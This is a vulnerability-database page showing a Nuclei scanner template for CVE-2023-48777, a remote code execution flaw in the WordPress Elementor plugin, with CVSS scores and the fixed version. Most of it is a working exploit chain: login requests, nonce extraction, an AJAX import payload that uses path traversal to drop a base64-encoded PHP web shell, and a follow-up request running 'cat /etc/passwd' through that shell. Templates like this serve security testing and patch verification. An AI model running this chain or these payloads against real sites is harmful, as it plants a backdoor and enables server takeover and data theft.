Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-48777HistoryFeb 22, 2024 - 6:20 a.m.
WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
2024-02-2206:20:52
ProjectDiscovery
github.com
152
cve
cve2023
elementor
file-upload
server
wordpress
wp-plugin
authenticated
code-execution
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
22.1%
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
id: CVE-2023-48777
info:
name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
remediation: Fixed in 3.18.2
reference:
- https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
- https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2023-48777
cwe-id: CWE-434
epss-score: 0.00054
epss-percentile: 0.21518
metadata:
verified: true
max-request: 4
framework: wordpress
publicwww-query: "/wp-content/plugins/elementor/"
tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
variables:
filename: "{{rand_base(6)}}"
payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
- |
GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_4)"
- "status_code_4 == 200"
condition: and
extractors:
- type: regex
internal: true
name: nonce
part: body
group: 1
regex:
- 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
# digest: 4b0a004830460221008bf58aa24ddd3c56ea97495962a5596e8fb115ff791e778f798822b880762953022100e12cc588c2b1eb10312f7c33f124907aaea0088092f98148f02bb2622e8bd232:922c64590222798bb761d5b6d8e72950Related
nvd
nvd
CVE-2023-48777
2024-03-26 21:15:52
wpexploit
wpexploit
wpvulndb
wpvulndb
wordfence
wordfence
openvas
openvas
WordPress Elementor Website Builder Plugin < 3.18.2 RCE Vulnerability
2023-06-02 00:00:00
zdt
zdt
cvelist
cvelist
cve
cve
CVE-2023-48777
2024-03-26 21:15:52
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
22.1%
Related for NUCLEI:CVE-2023-48777